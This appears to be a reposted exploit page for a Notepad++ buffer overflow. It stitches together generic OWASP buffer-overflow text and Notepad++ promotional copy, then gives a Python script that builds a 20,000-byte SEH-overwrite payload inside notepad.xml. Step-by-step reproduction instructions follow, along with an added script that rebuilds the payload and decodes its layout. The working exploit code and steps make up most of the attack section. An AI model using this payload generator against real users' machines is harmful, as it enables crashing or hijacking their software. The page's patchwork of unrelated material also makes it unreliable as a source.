Attackers generally use buffer overflows to corrupt the execution stack of a web application. By sending
carefully crafted input to a web application, an attacker can cause the
web application to execute arbitrary code, possibly taking over the
machine. Attackers have managed to identify buffer overflows in a
staggering array of products and components. Buffer overflow flaws can be present in both the web server and
application server products that serve the static and dynamic portions
of a site, or in the web application itself. Buffer overflows found in
commonly-used server products are likely to become widely known and can
pose a significant risk to users of these products. When web
applications use libraries, such as a graphics library to generate
images or a communications library to send e-mail, they open themselves
to potential buffer overflow attacks.
Literature detailing buffer overflow attacks against commonly-used products is readily available, and newly discovered vulnerabilities are reported almost daily.
Buffer overflows can also be found in custom web application
code, and may even be more likely, given the lack of scrutiny that web
applications typically go through. Buffer overflow attacks against
customized web applications can sometimes lead to interesting results.
In some cases, we have discovered that sending large inputs can cause
the web application or the back-end database to malfunction. It is
possible to cause a denial of service attack against the web site,
depending on the severity and specific nature of the flaw. Overly large
inputs could cause the application to display a detailed error message,
potentially leading to a successful attack on the system.
Notepad++ is a free (as in "free speech" and also as in "free beer") source code editor and Notepad replacement that supports several languages.
It runs in the MS Windows environment, and its use is governed by the GPL License.
Based on the powerful editing component Scintilla, Notepad++ is written in C++ and uses pure Win32 API and STL which ensures a higher execution speed and smaller program size. By optimizing as many routines as possible without losing user friendliness, Notepad++ is trying to reduce the world carbon dioxide emissions. When using less CPU power, the PC can throttle down and reduce power consumption, resulting in a greener environment.
Steps to Reproduce
1. Use the exploit code below to make a Python file on your Kali Linux system.
Code:
import struct

def little_endian(address):
    # pack a 32-bit address in little-endian order, as x86 expects it in memory
    return struct.pack("<L", address)

poc = b"\x41" * 591                  # filler up to the SEH record
poc += b"\xeb\x06\x90\x90"           # nSEH: JMP SHORT +6, skips over the handler address below
poc += little_endian(0x1004C31F)     # SEH: overwritten exception handler address
poc += b"\x90" * 80                  # NOP sled
poc += b"\x90" * (20000 - len(poc))  # pad the attribute value to 20000 bytes in total

# The escaped strings below spell out the XML wrapper that carries the payload:
#   <?xml version="1.0" encoding="UTF-8" ?>
#   <Schedule>
#       <Event Url="" Time="http://
#   <poc>" Folder="" />
#   </Schedule>
header = b"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"
header += b"\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a\x09\x3c\x45\x76\x65\x6e\x74\x20\x55"
header += b"\x72\x6c\x3d\x22\x22\x20\x54\x69\x6d\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x0a" + poc
footer = b"\x22\x20\x46\x6f\x6c\x64\x65\x72\x3d\x22\x22\x20\x2f\x3e\x0a\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a"
exploit = header + footer
filename = "notepad.xml"
# bytes literals and binary mode so the file is written byte-for-byte under Python 2 or 3
with open(filename, "wb") as file:
    file.write(exploit)
Create a Python file with your favorite editor; I am using nano.
nano notepad_exploit.py
2. Copy and paste the exploit into that file, then save and exit.
3. Run the file with the python command.
python notepad_exploit.py
4. The script writes notepad.xml (the filename set in the script) into the current directory. Check its contents with the command below.
cat notepad.xml
5. Now copy that file to your Windows system.
6. First, get a baseline: open Notepad++ with no file loaded and watch Windows performance.
Maximum CPU usage observed was 10%.
7. Now open notepad.xml in Notepad++ and watch CPU usage again; it was as follows:
Windows performance monitoring shows Notepad++ running very slowly once the file is open, and when characters are typed into it CPU usage climbs to 100%.
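As an added check that is not part of the original post or the exploit author's script, the Python below rebuilds the same file from readable XML (the hex escapes in the script decode to a `<Schedule>` document with the payload inside the `Time` attribute of an `<Event>` element) and then parses it back to show what the 20000-byte value is made of. The layout is the conventional SEH-overwrite shape: 591 bytes of filler, a 4-byte nSEH record holding `JMP SHORT +6`, the overwritten handler pointer 0x1004C31F, and then nothing but a NOP sled. The page does not say which module 0x1004C31F lives in or what instructions it points at; that it is a POP/POP/RET gadget is an assumption (the usual choice for this layout), and the function names `build_poc`, `analyze_poc` and `write_poc` are mine.

```python
import struct

# Constructed to mirror the page's generator (not the author's script).
# The page's header/footer hex escapes decode to this XML wrapper; the payload
# sits inside the Time="..." attribute of the <Event> element.
XML_HEADER = (b'<?xml version="1.0" encoding="UTF-8" ?>\n'
              b'<Schedule>\n\t<Event Url="" Time="http://\n')
XML_FOOTER = b'" Folder="" />\n</Schedule>\n'

OFFSET_TO_NSEH = 591        # filler bytes before the SEH record (from the page)
NSEH = b"\xeb\x06\x90\x90"  # JMP SHORT +6 followed by two NOPs (from the page)
SEH_HANDLER = 0x1004C31F    # handler address from the page; its module is not identified there
TOTAL_PAYLOAD = 20000       # length the page pads the attribute value to


def build_poc():
    """Rebuild the page's payload byte-for-byte."""
    payload = b"\x41" * OFFSET_TO_NSEH
    payload += NSEH
    payload += struct.pack("<I", SEH_HANDLER)   # same bytes as the page's little_endian()
    payload += b"\x90" * 80
    payload += b"\x90" * (TOTAL_PAYLOAD - len(payload))
    return XML_HEADER + payload + XML_FOOTER


def analyze_poc(data):
    """Locate the SEH-overwrite components in a generated file.

    Returns a dict describing where the filler ends, what lands in nSEH and
    SEH, and whether the short jump in nSEH reaches the NOP sled.
    """
    if not (data.startswith(XML_HEADER) and data.endswith(XML_FOOTER)):
        raise ValueError("file does not carry the expected <Schedule> wrapper")
    payload = data[len(XML_HEADER):len(data) - len(XML_FOOTER)]

    # The filler is uniform 'A's, so the first 0xEB 0x06 pair is the nSEH record.
    nseh_off = payload.find(b"\xeb\x06")
    if nseh_off < 0:
        raise ValueError("no JMP SHORT marker found; not an nSEH/SEH layout")
    (handler,) = struct.unpack_from("<I", payload, nseh_off + 4)

    # JMP SHORT +6 is a 2-byte instruction: execution resumes at nseh_off + 2 + 6,
    # i.e. immediately past the 4-byte handler address.
    jump_target = nseh_off + 2 + 6
    sled = payload[jump_target:]
    return {
        "offset_to_nseh": nseh_off,
        "filler_uniform": len(set(payload[:nseh_off])) == 1,
        "nseh": payload[nseh_off:nseh_off + 4],
        "seh_handler": handler,
        "jump_target": jump_target,
        "jump_lands_on_nop": sled[:1] == b"\x90",
        "nop_count": sled.count(b"\x90"),
        "non_nop_after_jump": len(sled) - sled.count(b"\x90"),  # 0 means no shellcode present
        "payload_len": len(payload),
        "total_len": len(data),
    }


def write_poc(path="notepad.xml"):
    """Write the rebuilt file to disk; returns the number of bytes written."""
    data = build_poc()
    with open(path, "wb") as fh:
        fh.write(data)
    return len(data)


if __name__ == "__main__":
    for key, value in sorted(analyze_poc(build_poc()).items()):
        print("%-20s %s" % (key, hex(value) if key == "seh_handler" else value))
```

Running the script prints the decoded layout: nSEH at offset 591, the handler pointer, the jump landing on the first NOP, and zero non-NOP bytes after the jump. That last number is the practical caveat: with no shellcode following the sled, the file as published can at most crash or hang the editor, which is the denial-of-service behaviour the steps above record rather than code execution.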
Credit:
# CVE: CVE-2014-1004
# Author: TaurusOmar
# Twitter: @TaurusOmar_
# Email: taurusomar13@gmail.com
References:
https://www.owasp.org/index.php/Buffer_Overflow
http://www.horstmann.com/sjsu/spring2008/cs40/buffer-overflow1.jpg